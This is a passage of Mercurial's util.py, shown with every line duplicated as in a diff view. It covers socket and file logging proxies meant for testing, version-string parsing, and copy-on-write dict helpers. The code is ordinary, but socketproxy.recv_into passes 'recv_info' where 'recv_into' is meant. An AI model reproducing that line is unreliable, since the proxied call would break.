565 ``read()`` and ``readline()``.
566 """
566 """
567 def _fillbuffer(self):
567 def _fillbuffer(self):
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569
569
570 fn = getattr(self._input._observer, r'osread', None)
570 fn = getattr(self._input._observer, r'osread', None)
571 if fn:
571 if fn:
572 fn(res, _chunksize)
572 fn(res, _chunksize)
573
573
574 return res
574 return res
575
575
576 # We use different observer methods because the operation isn't
576 # We use different observer methods because the operation isn't
577 # performed on the actual file object but on us.
577 # performed on the actual file object but on us.
578 def read(self, size):
578 def read(self, size):
579 res = super(observedbufferedinputpipe, self).read(size)
579 res = super(observedbufferedinputpipe, self).read(size)
580
580
581 fn = getattr(self._input._observer, r'bufferedread', None)
581 fn = getattr(self._input._observer, r'bufferedread', None)
582 if fn:
582 if fn:
583 fn(res, size)
583 fn(res, size)
584
584
585 return res
585 return res
586
586
587 def readline(self, *args, **kwargs):
587 def readline(self, *args, **kwargs):
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589
589
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 if fn:
591 if fn:
592 fn(res)
592 fn(res)
593
593
594 return res
594 return res
595
595
596 PROXIED_SOCKET_METHODS = {
596 PROXIED_SOCKET_METHODS = {
597 r'makefile',
597 r'makefile',
598 r'recv',
598 r'recv',
599 r'recvfrom',
599 r'recvfrom',
600 r'recvfrom_into',
600 r'recvfrom_into',
601 r'recv_into',
601 r'recv_into',
602 r'send',
602 r'send',
603 r'sendall',
603 r'sendall',
604 r'sendto',
604 r'sendto',
605 r'setblocking',
605 r'setblocking',
606 r'settimeout',
606 r'settimeout',
607 r'gettimeout',
607 r'gettimeout',
608 r'setsockopt',
608 r'setsockopt',
609 }
609 }
610
610
611 class socketproxy(object):
611 class socketproxy(object):
612 """A proxy around a socket that tells a watcher when events occur.
612 """A proxy around a socket that tells a watcher when events occur.
613
613
614 This is like ``fileobjectproxy`` except for sockets.
614 This is like ``fileobjectproxy`` except for sockets.
615
615
616 This type is intended to only be used for testing purposes. Think hard
616 This type is intended to only be used for testing purposes. Think hard
617 before using it in important code.
617 before using it in important code.
618 """
618 """
619 __slots__ = (
619 __slots__ = (
620 r'_orig',
620 r'_orig',
621 r'_observer',
621 r'_observer',
622 )
622 )
623
623
624 def __init__(self, sock, observer):
624 def __init__(self, sock, observer):
625 object.__setattr__(self, r'_orig', sock)
625 object.__setattr__(self, r'_orig', sock)
626 object.__setattr__(self, r'_observer', observer)
626 object.__setattr__(self, r'_observer', observer)
627
627
628 def __getattribute__(self, name):
628 def __getattribute__(self, name):
629 if name in PROXIED_SOCKET_METHODS:
629 if name in PROXIED_SOCKET_METHODS:
630 return object.__getattribute__(self, name)
630 return object.__getattribute__(self, name)
631
631
632 return getattr(object.__getattribute__(self, r'_orig'), name)
632 return getattr(object.__getattribute__(self, r'_orig'), name)
633
633
634 def __delattr__(self, name):
634 def __delattr__(self, name):
635 return delattr(object.__getattribute__(self, r'_orig'), name)
635 return delattr(object.__getattribute__(self, r'_orig'), name)
636
636
637 def __setattr__(self, name, value):
637 def __setattr__(self, name, value):
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639
639
640 def __nonzero__(self):
640 def __nonzero__(self):
641 return bool(object.__getattribute__(self, r'_orig'))
641 return bool(object.__getattribute__(self, r'_orig'))
642
642
643 __bool__ = __nonzero__
643 __bool__ = __nonzero__
644
644
645 def _observedcall(self, name, *args, **kwargs):
645 def _observedcall(self, name, *args, **kwargs):
646 # Call the original object.
646 # Call the original object.
647 orig = object.__getattribute__(self, r'_orig')
647 orig = object.__getattribute__(self, r'_orig')
648 res = getattr(orig, name)(*args, **kwargs)
648 res = getattr(orig, name)(*args, **kwargs)
649
649
650 # Call a method on the observer of the same name with arguments
650 # Call a method on the observer of the same name with arguments
651 # so it can react, log, etc.
651 # so it can react, log, etc.
652 observer = object.__getattribute__(self, r'_observer')
652 observer = object.__getattribute__(self, r'_observer')
653 fn = getattr(observer, name, None)
653 fn = getattr(observer, name, None)
654 if fn:
654 if fn:
655 fn(res, *args, **kwargs)
655 fn(res, *args, **kwargs)
656
656
657 return res
657 return res
658
658
659 def makefile(self, *args, **kwargs):
659 def makefile(self, *args, **kwargs):
660 res = object.__getattribute__(self, r'_observedcall')(
660 res = object.__getattribute__(self, r'_observedcall')(
661 r'makefile', *args, **kwargs)
661 r'makefile', *args, **kwargs)
662
662
663 # The file object may be used for I/O. So we turn it into a
663 # The file object may be used for I/O. So we turn it into a
664 # proxy using our observer.
664 # proxy using our observer.
665 observer = object.__getattribute__(self, r'_observer')
665 observer = object.__getattribute__(self, r'_observer')
666 return makeloggingfileobject(observer.fh, res, observer.name,
666 return makeloggingfileobject(observer.fh, res, observer.name,
667 reads=observer.reads,
667 reads=observer.reads,
668 writes=observer.writes,
668 writes=observer.writes,
669 logdata=observer.logdata,
669 logdata=observer.logdata,
670 logdataapis=observer.logdataapis)
670 logdataapis=observer.logdataapis)
671
671
672 def recv(self, *args, **kwargs):
672 def recv(self, *args, **kwargs):
673 return object.__getattribute__(self, r'_observedcall')(
673 return object.__getattribute__(self, r'_observedcall')(
674 r'recv', *args, **kwargs)
674 r'recv', *args, **kwargs)
675
675
676 def recvfrom(self, *args, **kwargs):
676 def recvfrom(self, *args, **kwargs):
677 return object.__getattribute__(self, r'_observedcall')(
677 return object.__getattribute__(self, r'_observedcall')(
678 r'recvfrom', *args, **kwargs)
678 r'recvfrom', *args, **kwargs)
679
679
680 def recvfrom_into(self, *args, **kwargs):
680 def recvfrom_into(self, *args, **kwargs):
681 return object.__getattribute__(self, r'_observedcall')(
681 return object.__getattribute__(self, r'_observedcall')(
682 r'recvfrom_into', *args, **kwargs)
682 r'recvfrom_into', *args, **kwargs)
683
683
684 def recv_into(self, *args, **kwargs):
684 def recv_into(self, *args, **kwargs):
685 return object.__getattribute__(self, r'_observedcall')(
685 return object.__getattribute__(self, r'_observedcall')(
686 r'recv_info', *args, **kwargs)
686 r'recv_info', *args, **kwargs)
687
687
688 def send(self, *args, **kwargs):
688 def send(self, *args, **kwargs):
689 return object.__getattribute__(self, r'_observedcall')(
689 return object.__getattribute__(self, r'_observedcall')(
690 r'send', *args, **kwargs)
690 r'send', *args, **kwargs)
691
691
692 def sendall(self, *args, **kwargs):
692 def sendall(self, *args, **kwargs):
693 return object.__getattribute__(self, r'_observedcall')(
693 return object.__getattribute__(self, r'_observedcall')(
694 r'sendall', *args, **kwargs)
694 r'sendall', *args, **kwargs)
695
695
696 def sendto(self, *args, **kwargs):
696 def sendto(self, *args, **kwargs):
697 return object.__getattribute__(self, r'_observedcall')(
697 return object.__getattribute__(self, r'_observedcall')(
698 r'sendto', *args, **kwargs)
698 r'sendto', *args, **kwargs)
699
699
700 def setblocking(self, *args, **kwargs):
700 def setblocking(self, *args, **kwargs):
701 return object.__getattribute__(self, r'_observedcall')(
701 return object.__getattribute__(self, r'_observedcall')(
702 r'setblocking', *args, **kwargs)
702 r'setblocking', *args, **kwargs)
703
703
704 def settimeout(self, *args, **kwargs):
704 def settimeout(self, *args, **kwargs):
705 return object.__getattribute__(self, r'_observedcall')(
705 return object.__getattribute__(self, r'_observedcall')(
706 r'settimeout', *args, **kwargs)
706 r'settimeout', *args, **kwargs)
707
707
708 def gettimeout(self, *args, **kwargs):
708 def gettimeout(self, *args, **kwargs):
709 return object.__getattribute__(self, r'_observedcall')(
709 return object.__getattribute__(self, r'_observedcall')(
710 r'gettimeout', *args, **kwargs)
710 r'gettimeout', *args, **kwargs)
711
711
712 def setsockopt(self, *args, **kwargs):
712 def setsockopt(self, *args, **kwargs):
713 return object.__getattribute__(self, r'_observedcall')(
713 return object.__getattribute__(self, r'_observedcall')(
714 r'setsockopt', *args, **kwargs)
714 r'setsockopt', *args, **kwargs)
715
715
716 class baseproxyobserver(object):
716 class baseproxyobserver(object):
717 def _writedata(self, data):
717 def _writedata(self, data):
718 if not self.logdata:
718 if not self.logdata:
719 if self.logdataapis:
719 if self.logdataapis:
720 self.fh.write('\n')
720 self.fh.write('\n')
721 self.fh.flush()
721 self.fh.flush()
722 return
722 return
723
723
724 # Simple case writes all data on a single line.
724 # Simple case writes all data on a single line.
725 if b'\n' not in data:
725 if b'\n' not in data:
726 if self.logdataapis:
726 if self.logdataapis:
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 else:
728 else:
729 self.fh.write('%s> %s\n'
729 self.fh.write('%s> %s\n'
730 % (self.name, stringutil.escapestr(data)))
730 % (self.name, stringutil.escapestr(data)))
731 self.fh.flush()
731 self.fh.flush()
732 return
732 return
733
733
734 # Data with newlines is written to multiple lines.
734 # Data with newlines is written to multiple lines.
735 if self.logdataapis:
735 if self.logdataapis:
736 self.fh.write(':\n')
736 self.fh.write(':\n')
737
737
738 lines = data.splitlines(True)
738 lines = data.splitlines(True)
739 for line in lines:
739 for line in lines:
740 self.fh.write('%s> %s\n'
740 self.fh.write('%s> %s\n'
741 % (self.name, stringutil.escapestr(line)))
741 % (self.name, stringutil.escapestr(line)))
742 self.fh.flush()
742 self.fh.flush()
743
743
744 class fileobjectobserver(baseproxyobserver):
744 class fileobjectobserver(baseproxyobserver):
745 """Logs file object activity."""
745 """Logs file object activity."""
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 logdataapis=True):
747 logdataapis=True):
748 self.fh = fh
748 self.fh = fh
749 self.name = name
749 self.name = name
750 self.logdata = logdata
750 self.logdata = logdata
751 self.logdataapis = logdataapis
751 self.logdataapis = logdataapis
752 self.reads = reads
752 self.reads = reads
753 self.writes = writes
753 self.writes = writes
754
754
755 def read(self, res, size=-1):
755 def read(self, res, size=-1):
756 if not self.reads:
756 if not self.reads:
757 return
757 return
758 # Python 3 can return None from reads at EOF instead of empty strings.
758 # Python 3 can return None from reads at EOF instead of empty strings.
759 if res is None:
759 if res is None:
760 res = ''
760 res = ''
761
761
762 if size == -1 and res == '':
762 if size == -1 and res == '':
763 # Suppress pointless read(-1) calls that return
763 # Suppress pointless read(-1) calls that return
764 # nothing. These happen _a lot_ on Python 3, and there
764 # nothing. These happen _a lot_ on Python 3, and there
765 # doesn't seem to be a better workaround to have matching
765 # doesn't seem to be a better workaround to have matching
766 # Python 2 and 3 behavior. :(
766 # Python 2 and 3 behavior. :(
767 return
767 return
768
768
769 if self.logdataapis:
769 if self.logdataapis:
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771
771
772 self._writedata(res)
772 self._writedata(res)
773
773
774 def readline(self, res, limit=-1):
774 def readline(self, res, limit=-1):
775 if not self.reads:
775 if not self.reads:
776 return
776 return
777
777
778 if self.logdataapis:
778 if self.logdataapis:
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780
780
781 self._writedata(res)
781 self._writedata(res)
782
782
783 def readinto(self, res, dest):
783 def readinto(self, res, dest):
784 if not self.reads:
784 if not self.reads:
785 return
785 return
786
786
787 if self.logdataapis:
787 if self.logdataapis:
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 res))
789 res))
790
790
791 data = dest[0:res] if res is not None else b''
791 data = dest[0:res] if res is not None else b''
792 self._writedata(data)
792 self._writedata(data)
793
793
794 def write(self, res, data):
794 def write(self, res, data):
795 if not self.writes:
795 if not self.writes:
796 return
796 return
797
797
798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 # returns the integer bytes written.
799 # returns the integer bytes written.
800 if res is None and data:
800 if res is None and data:
801 res = len(data)
801 res = len(data)
802
802
803 if self.logdataapis:
803 if self.logdataapis:
804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805
805
806 self._writedata(data)
806 self._writedata(data)
807
807
808 def flush(self, res):
808 def flush(self, res):
809 if not self.writes:
809 if not self.writes:
810 return
810 return
811
811
812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813
813
814 # For observedbufferedinputpipe.
814 # For observedbufferedinputpipe.
815 def bufferedread(self, res, size):
815 def bufferedread(self, res, size):
816 if not self.reads:
816 if not self.reads:
817 return
817 return
818
818
819 if self.logdataapis:
819 if self.logdataapis:
820 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 self.name, size, len(res)))
821 self.name, size, len(res)))
822
822
823 self._writedata(res)
823 self._writedata(res)
824
824
825 def bufferedreadline(self, res):
825 def bufferedreadline(self, res):
826 if not self.reads:
826 if not self.reads:
827 return
827 return
828
828
829 if self.logdataapis:
829 if self.logdataapis:
830 self.fh.write('%s> bufferedreadline() -> %d' % (
830 self.fh.write('%s> bufferedreadline() -> %d' % (
831 self.name, len(res)))
831 self.name, len(res)))
832
832
833 self._writedata(res)
833 self._writedata(res)
834
834
835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 logdata=False, logdataapis=True):
836 logdata=False, logdataapis=True):
837 """Turn a file object into a logging file object."""
837 """Turn a file object into a logging file object."""
838
838
839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 logdata=logdata, logdataapis=logdataapis)
840 logdata=logdata, logdataapis=logdataapis)
841 return fileobjectproxy(fh, observer)
841 return fileobjectproxy(fh, observer)
842
842
843 class socketobserver(baseproxyobserver):
843 class socketobserver(baseproxyobserver):
844 """Logs socket activity."""
844 """Logs socket activity."""
845 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 logdata=False, logdataapis=True):
846 logdata=False, logdataapis=True):
847 self.fh = fh
847 self.fh = fh
848 self.name = name
848 self.name = name
849 self.reads = reads
849 self.reads = reads
850 self.writes = writes
850 self.writes = writes
851 self.states = states
851 self.states = states
852 self.logdata = logdata
852 self.logdata = logdata
853 self.logdataapis = logdataapis
853 self.logdataapis = logdataapis
854
854
855 def makefile(self, res, mode=None, bufsize=None):
855 def makefile(self, res, mode=None, bufsize=None):
856 if not self.states:
856 if not self.states:
857 return
857 return
858
858
859 self.fh.write('%s> makefile(%r, %r)\n' % (
859 self.fh.write('%s> makefile(%r, %r)\n' % (
860 self.name, mode, bufsize))
860 self.name, mode, bufsize))
861
861
862 def recv(self, res, size, flags=0):
862 def recv(self, res, size, flags=0):
863 if not self.reads:
863 if not self.reads:
864 return
864 return
865
865
866 if self.logdataapis:
866 if self.logdataapis:
867 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 self.name, size, flags, len(res)))
868 self.name, size, flags, len(res)))
869 self._writedata(res)
869 self._writedata(res)
870
870
871 def recvfrom(self, res, size, flags=0):
871 def recvfrom(self, res, size, flags=0):
872 if not self.reads:
872 if not self.reads:
873 return
873 return
874
874
875 if self.logdataapis:
875 if self.logdataapis:
876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 self.name, size, flags, len(res[0])))
877 self.name, size, flags, len(res[0])))
878
878
879 self._writedata(res[0])
879 self._writedata(res[0])
880
880
881 def recvfrom_into(self, res, buf, size, flags=0):
881 def recvfrom_into(self, res, buf, size, flags=0):
882 if not self.reads:
882 if not self.reads:
883 return
883 return
884
884
885 if self.logdataapis:
885 if self.logdataapis:
886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 self.name, size, flags, res[0]))
887 self.name, size, flags, res[0]))
888
888
889 self._writedata(buf[0:res[0]])
889 self._writedata(buf[0:res[0]])
890
890
891 def recv_into(self, res, buf, size=0, flags=0):
891 def recv_into(self, res, buf, size=0, flags=0):
892 if not self.reads:
892 if not self.reads:
893 return
893 return
894
894
895 if self.logdataapis:
895 if self.logdataapis:
896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 self.name, size, flags, res))
897 self.name, size, flags, res))
898
898
899 self._writedata(buf[0:res])
899 self._writedata(buf[0:res])
900
900
901 def send(self, res, data, flags=0):
901 def send(self, res, data, flags=0):
902 if not self.writes:
902 if not self.writes:
903 return
903 return
904
904
905 self.fh.write('%s> send(%d, %d) -> %d' % (
905 self.fh.write('%s> send(%d, %d) -> %d' % (
906 self.name, len(data), flags, len(res)))
906 self.name, len(data), flags, len(res)))
907 self._writedata(data)
907 self._writedata(data)
908
908
909 def sendall(self, res, data, flags=0):
909 def sendall(self, res, data, flags=0):
910 if not self.writes:
910 if not self.writes:
911 return
911 return
912
912
913 if self.logdataapis:
913 if self.logdataapis:
914 # Returns None on success. So don't bother reporting return value.
914 # Returns None on success. So don't bother reporting return value.
915 self.fh.write('%s> sendall(%d, %d)' % (
915 self.fh.write('%s> sendall(%d, %d)' % (
916 self.name, len(data), flags))
916 self.name, len(data), flags))
917
917
918 self._writedata(data)
918 self._writedata(data)
919
919
920 def sendto(self, res, data, flagsoraddress, address=None):
920 def sendto(self, res, data, flagsoraddress, address=None):
921 if not self.writes:
921 if not self.writes:
922 return
922 return
923
923
924 if address:
924 if address:
925 flags = flagsoraddress
925 flags = flagsoraddress
926 else:
926 else:
927 flags = 0
927 flags = 0
928
928
929 if self.logdataapis:
929 if self.logdataapis:
930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
931 self.name, len(data), flags, address, res))
931 self.name, len(data), flags, address, res))
932
932
933 self._writedata(data)
933 self._writedata(data)
934
934
935 def setblocking(self, res, flag):
935 def setblocking(self, res, flag):
936 if not self.states:
936 if not self.states:
937 return
937 return
938
938
939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940
940
941 def settimeout(self, res, value):
941 def settimeout(self, res, value):
942 if not self.states:
942 if not self.states:
943 return
943 return
944
944
945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946
946
947 def gettimeout(self, res):
947 def gettimeout(self, res):
948 if not self.states:
948 if not self.states:
949 return
949 return
950
950
951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952
952
953 def setsockopt(self, res, level, optname, value):
953 def setsockopt(self, res, level, optname, value):
954 if not self.states:
954 if not self.states:
955 return
955 return
956
956
957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 self.name, level, optname, value, res))
958 self.name, level, optname, value, res))
959
959
960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 logdata=False, logdataapis=True):
961 logdata=False, logdataapis=True):
962 """Turn a socket into a logging socket."""
962 """Turn a socket into a logging socket."""
963
963
964 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 states=states, logdata=logdata,
965 states=states, logdata=logdata,
966 logdataapis=logdataapis)
966 logdataapis=logdataapis)
967 return socketproxy(fh, observer)
967 return socketproxy(fh, observer)
968
968
969 def version():
969 def version():
970 """Return version information if available."""
970 """Return version information if available."""
971 try:
971 try:
972 from . import __version__
972 from . import __version__
973 return __version__.version
973 return __version__.version
974 except ImportError:
974 except ImportError:
975 return 'unknown'
975 return 'unknown'
976
976
977 def versiontuple(v=None, n=4):
977 def versiontuple(v=None, n=4):
978 """Parses a Mercurial version string into an N-tuple.
978 """Parses a Mercurial version string into an N-tuple.
979
979
980 The version string to be parsed is specified with the ``v`` argument.
980 The version string to be parsed is specified with the ``v`` argument.
981 If it isn't defined, the current Mercurial version string will be parsed.
981 If it isn't defined, the current Mercurial version string will be parsed.
982
982
983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 returned values:
984 returned values:
985
985
986 >>> v = b'3.6.1+190-df9b73d2d444'
986 >>> v = b'3.6.1+190-df9b73d2d444'
987 >>> versiontuple(v, 2)
987 >>> versiontuple(v, 2)
988 (3, 6)
988 (3, 6)
989 >>> versiontuple(v, 3)
989 >>> versiontuple(v, 3)
990 (3, 6, 1)
990 (3, 6, 1)
991 >>> versiontuple(v, 4)
991 >>> versiontuple(v, 4)
992 (3, 6, 1, '190-df9b73d2d444')
992 (3, 6, 1, '190-df9b73d2d444')
993
993
994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 (3, 6, 1, '190-df9b73d2d444+20151118')
995 (3, 6, 1, '190-df9b73d2d444+20151118')
996
996
997 >>> v = b'3.6'
997 >>> v = b'3.6'
998 >>> versiontuple(v, 2)
998 >>> versiontuple(v, 2)
999 (3, 6)
999 (3, 6)
1000 >>> versiontuple(v, 3)
1000 >>> versiontuple(v, 3)
1001 (3, 6, None)
1001 (3, 6, None)
1002 >>> versiontuple(v, 4)
1002 >>> versiontuple(v, 4)
1003 (3, 6, None, None)
1003 (3, 6, None, None)
1004
1004
1005 >>> v = b'3.9-rc'
1005 >>> v = b'3.9-rc'
1006 >>> versiontuple(v, 2)
1006 >>> versiontuple(v, 2)
1007 (3, 9)
1007 (3, 9)
1008 >>> versiontuple(v, 3)
1008 >>> versiontuple(v, 3)
1009 (3, 9, None)
1009 (3, 9, None)
1010 >>> versiontuple(v, 4)
1010 >>> versiontuple(v, 4)
1011 (3, 9, None, 'rc')
1011 (3, 9, None, 'rc')
1012
1012
1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 >>> versiontuple(v, 2)
1014 >>> versiontuple(v, 2)
1015 (3, 9)
1015 (3, 9)
1016 >>> versiontuple(v, 3)
1016 >>> versiontuple(v, 3)
1017 (3, 9, None)
1017 (3, 9, None)
1018 >>> versiontuple(v, 4)
1018 >>> versiontuple(v, 4)
1019 (3, 9, None, 'rc+2-02a8fea4289b')
1019 (3, 9, None, 'rc+2-02a8fea4289b')
1020
1020
1021 >>> versiontuple(b'4.6rc0')
1021 >>> versiontuple(b'4.6rc0')
1022 (4, 6, None, 'rc0')
1022 (4, 6, None, 'rc0')
1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 (4, 6, None, 'rc0+12-425d55e54f98')
1024 (4, 6, None, 'rc0+12-425d55e54f98')
1025 >>> versiontuple(b'.1.2.3')
1025 >>> versiontuple(b'.1.2.3')
1026 (None, None, None, '.1.2.3')
1026 (None, None, None, '.1.2.3')
1027 >>> versiontuple(b'12.34..5')
1027 >>> versiontuple(b'12.34..5')
1028 (12, 34, None, '..5')
1028 (12, 34, None, '..5')
1029 >>> versiontuple(b'1.2.3.4.5.6')
1029 >>> versiontuple(b'1.2.3.4.5.6')
1030 (1, 2, 3, '.4.5.6')
1030 (1, 2, 3, '.4.5.6')
1031 """
1031 """
1032 if not v:
1032 if not v:
1033 v = version()
1033 v = version()
1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 if not m:
1035 if not m:
1036 vparts, extra = '', v
1036 vparts, extra = '', v
1037 elif m.group(2):
1037 elif m.group(2):
1038 vparts, extra = m.groups()
1038 vparts, extra = m.groups()
1039 else:
1039 else:
1040 vparts, extra = m.group(1), None
1040 vparts, extra = m.group(1), None
1041
1041
1042 vints = []
1042 vints = []
1043 for i in vparts.split('.'):
1043 for i in vparts.split('.'):
1044 try:
1044 try:
1045 vints.append(int(i))
1045 vints.append(int(i))
1046 except ValueError:
1046 except ValueError:
1047 break
1047 break
1048 # (3, 6) -> (3, 6, None)
1048 # (3, 6) -> (3, 6, None)
1049 while len(vints) < 3:
1049 while len(vints) < 3:
1050 vints.append(None)
1050 vints.append(None)
1051
1051
1052 if n == 2:
1052 if n == 2:
1053 return (vints[0], vints[1])
1053 return (vints[0], vints[1])
1054 if n == 3:
1054 if n == 3:
1055 return (vints[0], vints[1], vints[2])
1055 return (vints[0], vints[1], vints[2])
1056 if n == 4:
1056 if n == 4:
1057 return (vints[0], vints[1], vints[2], extra)
1057 return (vints[0], vints[1], vints[2], extra)
1058
1058
1059 def cachefunc(func):
1059 def cachefunc(func):
1060 '''cache the result of function calls'''
1060 '''cache the result of function calls'''
1061 # XXX doesn't handle keywords args
1061 # XXX doesn't handle keywords args
1062 if func.__code__.co_argcount == 0:
1062 if func.__code__.co_argcount == 0:
1063 cache = []
1063 cache = []
1064 def f():
1064 def f():
1065 if len(cache) == 0:
1065 if len(cache) == 0:
1066 cache.append(func())
1066 cache.append(func())
1067 return cache[0]
1067 return cache[0]
1068 return f
1068 return f
1069 cache = {}
1069 cache = {}
1070 if func.__code__.co_argcount == 1:
1070 if func.__code__.co_argcount == 1:
1071 # we gain a small amount of time because
1071 # we gain a small amount of time because
1072 # we don't need to pack/unpack the list
1072 # we don't need to pack/unpack the list
1073 def f(arg):
1073 def f(arg):
1074 if arg not in cache:
1074 if arg not in cache:
1075 cache[arg] = func(arg)
1075 cache[arg] = func(arg)
1076 return cache[arg]
1076 return cache[arg]
1077 else:
1077 else:
1078 def f(*args):
1078 def f(*args):
1079 if args not in cache:
1079 if args not in cache:
1080 cache[args] = func(*args)
1080 cache[args] = func(*args)
1081 return cache[args]
1081 return cache[args]
1082
1082
1083 return f
1083 return f
1084
1084
1085 class cow(object):
1085 class cow(object):
1086 """helper class to make copy-on-write easier
1086 """helper class to make copy-on-write easier
1087
1087
1088 Call preparewrite before doing any writes.
1088 Call preparewrite before doing any writes.
1089 """
1089 """
1090
1090
1091 def preparewrite(self):
1091 def preparewrite(self):
1092 """call this before writes, return self or a copied new object"""
1092 """call this before writes, return self or a copied new object"""
1093 if getattr(self, '_copied', 0):
1093 if getattr(self, '_copied', 0):
1094 self._copied -= 1
1094 self._copied -= 1
1095 return self.__class__(self)
1095 return self.__class__(self)
1096 return self
1096 return self
1097
1097
1098 def copy(self):
1098 def copy(self):
1099 """always do a cheap copy"""
1099 """always do a cheap copy"""
1100 self._copied = getattr(self, '_copied', 0) + 1
1100 self._copied = getattr(self, '_copied', 0) + 1
1101 return self
1101 return self
1102
1102
1103 class sortdict(collections.OrderedDict):
1103 class sortdict(collections.OrderedDict):
1104 '''a simple sorted dictionary
1104 '''a simple sorted dictionary
1105
1105
1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 >>> d2 = d1.copy()
1107 >>> d2 = d1.copy()
1108 >>> d2
1108 >>> d2
1109 sortdict([('a', 0), ('b', 1)])
1109 sortdict([('a', 0), ('b', 1)])
1110 >>> d2.update([(b'a', 2)])
1110 >>> d2.update([(b'a', 2)])
1111 >>> list(d2.keys()) # should still be in last-set order
1111 >>> list(d2.keys()) # should still be in last-set order
1112 ['b', 'a']
1112 ['b', 'a']
1113 '''
1113 '''
1114
1114
1115 def __setitem__(self, key, value):
1115 def __setitem__(self, key, value):
1116 if key in self:
1116 if key in self:
1117 del self[key]
1117 del self[key]
1118 super(sortdict, self).__setitem__(key, value)
1118 super(sortdict, self).__setitem__(key, value)
1119
1119
1120 if pycompat.ispypy:
1120 if pycompat.ispypy:
1121 # __setitem__() isn't called as of PyPy 5.8.0
1121 # __setitem__() isn't called as of PyPy 5.8.0
1122 def update(self, src):
1122 def update(self, src):
1123 if isinstance(src, dict):
1123 if isinstance(src, dict):
1124 src = src.iteritems()
1124 src = src.iteritems()
1125 for k, v in src:
1125 for k, v in src:
1126 self[k] = v
1126 self[k] = v
1127
1127
1128 class cowdict(cow, dict):
1128 class cowdict(cow, dict):
1129 """copy-on-write dict
1129 """copy-on-write dict
1130
1130
1131 Be sure to call d = d.preparewrite() before writing to d.
1131 Be sure to call d = d.preparewrite() before writing to d.
1132
1132
1133 >>> a = cowdict()
1133 >>> a = cowdict()
1134 >>> a is a.preparewrite()
1134 >>> a is a.preparewrite()
1135 True
1135 True
1136 >>> b = a.copy()
1136 >>> b = a.copy()
1137 >>> b is a
1137 >>> b is a
1138 True
1138 True
1139 >>> c = b.copy()
1139 >>> c = b.copy()
1140 >>> c is a
1140 >>> c is a
1141 True
1141 True
1142 >>> a = a.preparewrite()
1142 >>> a = a.preparewrite()
1143 >>> b is a
1143 >>> b is a
1144 False
1144 False
1145 >>> a is a.preparewrite()
1145 >>> a is a.preparewrite()
1146 True
1146 True
1147 >>> c = c.preparewrite()
1147 >>> c = c.preparewrite()
1148 >>> b is c
1148 >>> b is c
1149 False
1149 False
1150 >>> b is b.preparewrite()
1150 >>> b is b.preparewrite()
1151 True
1151 True
1152 """
1152 """
1153
1153
1154 class cowsortdict(cow, sortdict):
